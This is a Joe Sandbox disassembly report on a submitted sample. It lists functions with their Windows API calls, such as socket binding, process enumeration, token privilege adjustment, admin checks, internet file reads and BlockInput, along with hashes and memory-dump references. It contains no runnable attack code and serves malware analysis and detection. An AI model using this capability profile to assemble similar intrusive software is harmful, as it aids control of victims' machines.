Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: ebf5c3724aa630edc4d93af6a25a68c29f7739bb0d46730f5f960dd338ffb48d
Instruction ID: 693913a2d61639eab732a40c572ed853e5c3b9c5950393d626845ee79c562ba5
Opcode Fuzzy Hash: ebf5c3724aa630edc4d93af6a25a68c29f7739bb0d46730f5f960dd338ffb48d
Instruction Fuzzy Hash: 3841C275740210AFEB10BF68DC86F7E77A99B88720F04815AF95AAB3D2CA749D009791

Uniqueness

Uniqueness Score: -1.00%

Function 009E55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 009E564C
IsWindowEnabled.USER32 ref: 009E565A
GetForegroundWindow.USER32(?,?,00000001), ref: 009E5667
IsIconic.USER32 ref: 009E5675
IsZoomed.USER32 ref: 009E5683

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 175bb38b85537d3318c445a161ce82a691511ebb4cd1571aa1e7b7ba818b3186
Instruction ID: c5f2113cdc56e8aa0d866d731e44ec2e3ef944564ada6fa2dd94598ae12f1db3
Opcode Fuzzy Hash: 175bb38b85537d3318c445a161ce82a691511ebb4cd1571aa1e7b7ba818b3186
Instruction Fuzzy Hash: 5111B2313009906FEB221F27DC54B2B779CEF94B25B464429F806DB251CB74DD01CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 009DC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009A1D88,?), ref: 009DC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009DC324

Strings

GetSystemWow64DirectoryW, xrefs: 009DC31E
kernel32.dll, xrefs: 009DC30D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 5ccbbc590ac55975e211ceb853c1847e5bea682b4dca1d5af5535a7e899c57ec
Instruction ID: 3bd632466b279c12e84d362e732d3005452b0e11b9a8ee17629ce7a01e14cda0
Opcode Fuzzy Hash: 5ccbbc590ac55975e211ceb853c1847e5bea682b4dca1d5af5535a7e899c57ec
Instruction Fuzzy Hash: A0E08CB0250703CFCB204B69D854A86B6D8EB08345B80C83BE889C6220E770D880CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00973190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: ba24d12c6f4c5a925fe367cb46dc167cc6b6080f203c180583b1405ac1799d79
Instruction ID: d63fed5d82a2d13f5ad0c4feca208500ffb6ffdd2761381853b240aa14ff5f73
Opcode Fuzzy Hash: ba24d12c6f4c5a925fe367cb46dc167cc6b6080f203c180583b1405ac1799d79
Instruction Fuzzy Hash: C822CD726083019FC724DF64C892B6FB7E8AFC5710F10891DF89A97291DB34EA04DB92

Uniqueness

Uniqueness Score: -1.00%

Function 009DF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009DF151
Process32FirstW.KERNEL32(00000000,?), ref: 009DF15F

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Process32NextW.KERNEL32(00000000,?), ref: 009DF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 009DF22E

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: bbbacccd9b24eaf1709e46edf762db8944e02f2e5b2e54fbae203984ddd421de
Instruction ID: e79121d10c8bf85b80402761bb04a930c6d18b4ff7eab6fd7401f2639cb9b3ea
Opcode Fuzzy Hash: bbbacccd9b24eaf1709e46edf762db8944e02f2e5b2e54fbae203984ddd421de
Instruction Fuzzy Hash: E7517D71508300AFD310EF64DC92B6BB7E8BF84710F14492EF59697291EB70A904CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009C40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009C40D1
_memset.LIBCMT ref: 009C40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009C4144
CloseHandle.KERNEL32(00000000), ref: 009C414D

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: e65bb4a98f9c47e5a78f593cf93a1216f9f69277c2bf78b08dcb0e3576d5730c
Instruction ID: 67048cf00bfab99c71464aa3250f25b9bb894e8f38f9ee086a1890da87dd1772
Opcode Fuzzy Hash: e65bb4a98f9c47e5a78f593cf93a1216f9f69277c2bf78b08dcb0e3576d5730c
Instruction Fuzzy Hash: 0711EB75D012287AD7309BA59C4DFABBB7CEF44760F1041AAF908D7180D6744E808BA5

Uniqueness

Uniqueness Score: -1.00%

Function 009BEB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009BEB19

Strings

(, xrefs: 009BEB5F
|, xrefs: 009BEB49

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 393659c2a11c70355368cdb5d41ddc2f6f6c254442aeec5325bc504719079ff7
Instruction ID: 38ff9be6dc90cdaa6137c4aad7bfb32c9c6a60fff128531165294a972d8e80d1
Opcode Fuzzy Hash: 393659c2a11c70355368cdb5d41ddc2f6f6c254442aeec5325bc504719079ff7
Instruction Fuzzy Hash: C9324775A007059FD728DF19C591AAAB7F4FF48320B11C56EE89ACB3A1DB70E941CB40

Uniqueness

Uniqueness Score: -1.00%

Function 009D25E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 009D26D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009D270C

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 76c2dbc79babeafc06f2fe1e023aa4b8039b33388b224cca2df7f2f2caec59cb
Instruction ID: 91e4a6add54584757fc25a56b39c337383841304f11e1e0998e668d344f1e425
Opcode Fuzzy Hash: 76c2dbc79babeafc06f2fe1e023aa4b8039b33388b224cca2df7f2f2caec59cb
Instruction Fuzzy Hash: 7441D075544309BFEB209F94DC85FBBB7BCEBA0764F10806BF601A6340EA71EE419660

Uniqueness

Uniqueness Score: -1.00%

Function 009CB59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009CB5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009CB608
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009CB655

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: cc85ed5f489c5cbe23f2ba0388491f233c1823c2bed6260eb99bb2c17bbbfa15
Instruction ID: 56ed802246cea324b2d4757a029eed46647f5259ed5bf0174f89c2c6ae40eb22
Opcode Fuzzy Hash: cc85ed5f489c5cbe23f2ba0388491f233c1823c2bed6260eb99bb2c17bbbfa15
Instruction Fuzzy Hash: B2216D35A10518EFCB00EFA5D991FEDBBB8FF88310F1480AAE945AB351DB31A915CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009B8CC3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00980FF6: std::exception::exception.LIBCMT ref: 0098102C
Part of subcall function 00980FF6: __CxxThrowException@8.LIBCMT ref: 00981041

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009B8D0D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009B8D3A
GetLastError.KERNEL32 ref: 009B8D47

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 09893f26b953a8c1974c4b250b08eb29106066215c2778c4c0425cd747547346
Instruction ID: 6bd7cc092b03c4ee9871755cced1637b81f9a1da3b60b728a409194c10effd28
Opcode Fuzzy Hash: 09893f26b953a8c1974c4b250b08eb29106066215c2778c4c0425cd747547346
Instruction Fuzzy Hash: C0118FB2414209AFD728AF54DD85D6BB7BCEB88721B20852EF45697251EF30AC45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C4C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 009C4C2C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009C4C43
FreeSid.ADVAPI32(?), ref: 009C4C53

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: a00ca5f2068f7a644b2f4bc46b22b49b23eaf811c60ae8576667ec3fbf94944b
Instruction ID: 9673412f42278021ace6520111a681483e9e38b78751c7ab7f8dba91cba14f43
Opcode Fuzzy Hash: a00ca5f2068f7a644b2f4bc46b22b49b23eaf811c60ae8576667ec3fbf94944b
Instruction Fuzzy Hash: 51F04975A5130CBFDF04DFF0DC99AAEBBBCEF08311F0044AAA901E6181E670AA049B50

Uniqueness

Uniqueness Score: -1.00%

Function 0096E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2388d3eb820b2c5013ad02a583c0f5ddb097f920688921dce79c0254102a9b
Instruction ID: 1812825e380995e4c6b25798c6c2f558ebea2231f4032cff9391aeceb28e883f
Opcode Fuzzy Hash: cf2388d3eb820b2c5013ad02a583c0f5ddb097f920688921dce79c0254102a9b
Instruction Fuzzy Hash: F7229D78A04216CFDB24DF68C490BBEB7F9FF45300F148469E856AB391E734A985CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009CC93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009CC966
FindClose.KERNEL32(00000000), ref: 009CC996

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c14ac220ca698fb51a77d84cd556a43b927fbfa33170476384b676458e052cc6
Instruction ID: a0331cc6ee8b8fe0a5c2481db05a3092816e0404d09184e22488c157dda4f3d5
Opcode Fuzzy Hash: c14ac220ca698fb51a77d84cd556a43b927fbfa33170476384b676458e052cc6
Instruction Fuzzy Hash: D01161726146049FDB10EF29D855A2AF7E9FF84324F04891EF9A9DB391DB34AC00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 009CA2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,009D977D,?,009EFB84,?), ref: 009CA302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,009D977D,?,009EFB84,?), ref: 009CA314

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 773eb22fd5e89c17a4910ea7c4d1ea23311a4cb85e9accb835cfe86ed70cf78c
Instruction ID: 96a223a634b7e51f679d0ff518c04e1ba7216c3d9bd4d55c96951244bb8cc9c7
Opcode Fuzzy Hash: 773eb22fd5e89c17a4910ea7c4d1ea23311a4cb85e9accb835cfe86ed70cf78c
Instruction Fuzzy Hash: 1FF0823555826DBBDB109FA4CC48FEA776DBF08761F00416AB918D6181D6309940CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009B8713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009B8851), ref: 009B8728
CloseHandle.KERNEL32(?,?,009B8851), ref: 009B873A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: d3a127b82fa275e56d071798ec8cb860eeb07f0cac87bf75f8dc506b8248e435
Instruction ID: 913dcb4f3b995ef441cff88e56c3fe684c27f7ecb4a69cf6b25d086c57000a79
Opcode Fuzzy Hash: d3a127b82fa275e56d071798ec8cb860eeb07f0cac87bf75f8dc506b8248e435
Instruction Fuzzy Hash: 96E08C32014640EFE7212F20EC08E737BEDEF44360B20883EF49680470CB22AC91EB10

Uniqueness

Uniqueness Score: -1.00%

Function 0098A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00988F97,?,?,?,00000001), ref: 0098A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0098A3A3

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 1f23e07f061ec9f75a214494c522f286d81390d761a4b28c8da7c5f1d7d91d18
Instruction ID: b375820613e388b1bcc7d30d6db36706ca7af97ae1e3b1b473cd6f834c42af6a
Opcode Fuzzy Hash: 1f23e07f061ec9f75a214494c522f286d81390d761a4b28c8da7c5f1d7d91d18
Instruction Fuzzy Hash: F3B09231068248ABCA002B91EC59B883F68EB44BE2F405022F60D88464CB625950AA91

Uniqueness

Uniqueness Score: -1.00%

Function 0098F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7007007886ee81422a9fd413cd21b3b009ccf8e2dd96114c1cea29e0f7e8c159
Instruction ID: 3f12862991f0c37c65063c36a781f25874fba72c58a401e847c3dd3ec21e9955
Opcode Fuzzy Hash: 7007007886ee81422a9fd413cd21b3b009ccf8e2dd96114c1cea29e0f7e8c159
Instruction Fuzzy Hash: FF320621D6DF014DD7236634D832336A24DAFB73D5F15E737E819B5AA6EB28C5839200

Uniqueness

Uniqueness Score: -1.00%

Function 0099267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f1837621fa6e9ded62f19e19a7c950c60271d9c3c607ead3761c5bac646a495
Instruction ID: c3292c36387b79b9bb75ab9a276007731782acd87f7c1542559b89b3df8cbbfa
Opcode Fuzzy Hash: 2f1837621fa6e9ded62f19e19a7c950c60271d9c3c607ead3761c5bac646a495
Instruction Fuzzy Hash: B4B1FF60D3AF414DD72396398831336BA8CAFBB2D5F52D71BFC2A70D22EB2185839141

Uniqueness

Uniqueness Score: -1.00%

Function 009C8B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 009C8B25

Part of subcall function 0098543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009C91F8,00000000,?,?,?,?,009C93A9,00000000,?), ref: 00985443
Part of subcall function 0098543A: __aulldiv.LIBCMT ref: 00985463

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 802f851be85604de09480d0f59165553a508a9e1ae53655cd5658c8fa49a7755
Instruction ID: f15d52798126866414de7cc6e0e7c4f0d67c4761180e2f152a06b507d6543ce7
Opcode Fuzzy Hash: 802f851be85604de09480d0f59165553a508a9e1ae53655cd5658c8fa49a7755
Instruction Fuzzy Hash: 3521E472A355108BC329CF29D841B62B3E1EFA5311B298E6CD0E5CB2D0CE74BD06CB94

Uniqueness

Uniqueness Score: -1.00%

Function 009D41FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 009D4218

